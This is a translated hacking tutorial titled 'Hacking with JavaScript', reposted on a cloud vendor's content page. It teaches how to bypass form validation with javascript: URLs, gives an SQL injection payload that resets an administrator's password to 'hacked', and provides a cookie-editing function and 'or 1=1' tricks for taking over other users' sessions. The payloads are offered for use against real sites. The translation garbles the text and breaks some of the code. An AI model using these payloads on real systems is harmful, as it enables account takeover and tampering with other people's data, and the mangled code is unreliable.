Hack with JavaScript

Source: Internet
Author: User
Very good. It has guiding significance for me.
-----------------------------------------------------------
Author: invincible and most lonely [e.s. T]
Source: evil baboons China
Source: Unknown
Disclaimer: This article is included in an email sent to me by a friend from abroad. The original author was written by dr_amado. it took me an hour to connect to the translation, so please indicate the source in the post.

Hacking with JavaScript

This tutorial describes how to use JavaScript to bypass some simple or more advanced HTML form restrictions and Cookie/session verification.

Simple Form restrictions

1. Bypass required table items

You will often encounter some pages that require you to fill all the table items to submit, but we are likely to bypass these restrictions. if you take a closer look at the source code of the page and find the code about form submission, you will find an onsubmit attribute in the form tag. when you see this attribute, we hope to try to bypass these restrictions. as we all know, JavaScript can control all elements in the page, including form elements. therefore, we can use JavaScript to modify, delete, and add arbitrary elements to every page we browse.

Therefore, we can use JavaScript to clear the ousubmit attribute in the form, so that we can successfully submit the form without restrictions.

The onsubmit attribute usually points to a function that is used to check the correct format of the data in the form submission ):
Function fcheck (){
If (! Form. readed. Checked)
{
Alert ("you must accept the terms of service before registering! ");
Form. readed. Focus ();
Return false;
}

...
<Form action = "reg2.jsp" method = "Post" name = "form" onsubmit = "Return fcheck ()">
...
</Form>

A detailed description of fcheck () functions is not covered in this article. If you want to write them, please check the relevant information. the code above shows that if some form items are not filled (for example, some single-choice items or multiple options), the form cannot be submitted. now we need to modify the onsubmit attribute. The following two methods can be used to directly return true using JavaScript:
Document. Forms [X]. onsubmit = "Return true ;";

Or

Document. Form. onsubmit = "Return true ;";

Using these two statements can make the form unlimitedly successfully submitted, but the key lies in how we execute the above JavaScript statement? In fact, we can directly input this statement into the address bar, and then press enter to execute. The statement is as follows:

Javascript: Document. Form. onsubmit = "Return true ;";

However, only the preceding statement won't succeed, because the values returned by the preceding statement will be directly written to the page, and we cannot enter the form any more. therefore, we must avoid writing values to the page by using the Alert () function:

Javascript: Alert (document. Form. onsubmit = "Return true ;");

When you run the preceding statement, a dialog box with "Return true;" is displayed, instead of being written to the page. now you can enter your form content without any restrictions. (Note: The following test uses a free email application page in China as an example ):

If you do not enter the password, a dialog box is displayed, as shown in the following figure:

In this case, we first check the source code according to the above Russian method and find the code for submitting the form:
<Form action = "reg2.jsp" method = "Post" name = "form" onsubmit = "Return fcheck ()">
If the name is form, enter the following statement in the address bar:
Javascript: Alert (document. Form. onsubmit = "Return true ;");
Then press enter, for example:

At this time, we re-register the following, and do not enter the password column, and then submit the form result as follows:

Haha... isn't it going around... continue to play with the big guy's own.

2. Change table items

After you try to change the onsubmit attribute of the form to do what you want, let's think about what restrictions we have? Of course, you can now modify the onsubmit attribute of the form. Similarly, we can use this method to modify any object on the page, as shown below:
Javascript: Alert (document. spamform. fieldname. value = "dr_amado was here! ");

Or

Javascript: Alert (document. Forms [X]. fieldname. value = "dr_amado was here! ");

Oh, it's easy? You can modify anything you think you can modify... Just do it!

SQL Injection

1. Take advantage of forms

You are familiar with SQL injection. This time, I will explain whether the vulnerability form will be correctly handled.

Obtain database information

A frequently used method to obtain system information is to intentionally cause an error in SQL queries to obtain specific information from the website database: this is what we call the "explosive" club?). You can search for forms, dynamic links, and session cookies by mistake. most articles about SQL injection are about how to use dynamic links and text boxes to execute SQL query statements. however, I think these vulnerabilities are more common among other types (select boxes, hidden fields, checkboxes and radio buttons, and cookies !).

If the mixed data type is not properly encoded, it will easily cause a page crash. For example, for "memberinfo. php? O_id = 1 "and add a double quotation mark (double quotation mark) or single quotation mark (single quotation mark) to the link. Fortunately, you will get debugging information that includes some SQL query statements. when you get the information you need, you can determine what to do next.

Change the table item Value

The first form to be considered is the user data page. most user data pages are not well filtered, such as select boxes form items. the method to exploit this vulnerability is to insert an SQL query statement in the Value Field of this form item. enter the following in the address bar of IE:

Javascript: Alert (document. profileform. user_sex.value = "Gay/', user_pasword =/'hacked/' Where user_id = 1 #");

Assume that the query statement on the server is as follows:
"Update user_data set user_password = '$ user_password', user_email = '$ user_email', user_sex = '$ user_sex' Where user_id = $ user_id ";

The query statement after inserting our SQL statement is as follows:

"Update user_data set user_password = 'mypassword', user_email = 'mymail', user_sex = 'gay', user_password = 'hacked' where
User_id = 1 # 'where user_id = 7382 ";

"#" This is an SQL annotator.

2. session cookies Bypass

Bypass basic session cookie Verification

In many cases, session processing uses cookies. If the page does not correctly process session cookies, an attacker can use this vulnerability to change his or her user identity to another user.
Cookies are stored in "your website Doc ument. cookie ". using JavaScript, we can erase, edit, and create cookies for any website. this is much more complicated than the general attack method. here I will briefly introduce"

View cookies:
Javascript: Alert (Unescape (document. Cookie ));

Modify cookies:

Javascript: Alert (window. C = functiona (n, V, NV) {c = document. cookie; C = C. substring (C. indexof (n) + N. length, C. length); C = C. substring (1 ,(

(C. indexof (";")>-1 )? C. indexof (";"): C. length); NC = Unescape (c ). replace (v, NV); document. cookie = N + "=" + escape (NC); Return

Unescape (document. cookie) ;}); alert (C (prompt ("Cookie name:", ""), Prompt ("replace this value:", ""), Prompt (": :","")));

Assume that you log on to www.ima13370h4x0r.net as "John Doe". The cookie you get is as follows:

Sessiondata = A: 3: {s: 11: "sessionuser"; s: 5: "75959"; s: 9: "sessionid"; I: 70202768; s: 9: "lastvisit"; I: 1078367189 ;}

We only care about the value "75959" because it is the value of user_id. many times, you may find that some websites store some key data (such as user_id) in cookies, which is a very serious vulnerability, because any user can change their user_id value to another user, such as the user_id value of the administrator user.
.
Once you declare window. after the C function, it is much easier to modify the cookie value. first modify S: 5: "75959" to S: X: "adminid", where X is the length of the new value. for example, if you want to change 75959 to 1, you must change s: 5: "75959" to S: 1: "1 ". sometimes some sites use SQL query statements with the WHERE clause to maintain the user's logon status. In this case, you need to set 75959 to a value similar to "13 or 1 = 1.

Note:
The embedded Javascript declaration can be added to your browser's favorites, so that you can easily declare your own function in the following form:
"Alert (window. newfunction = function (){...})"

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.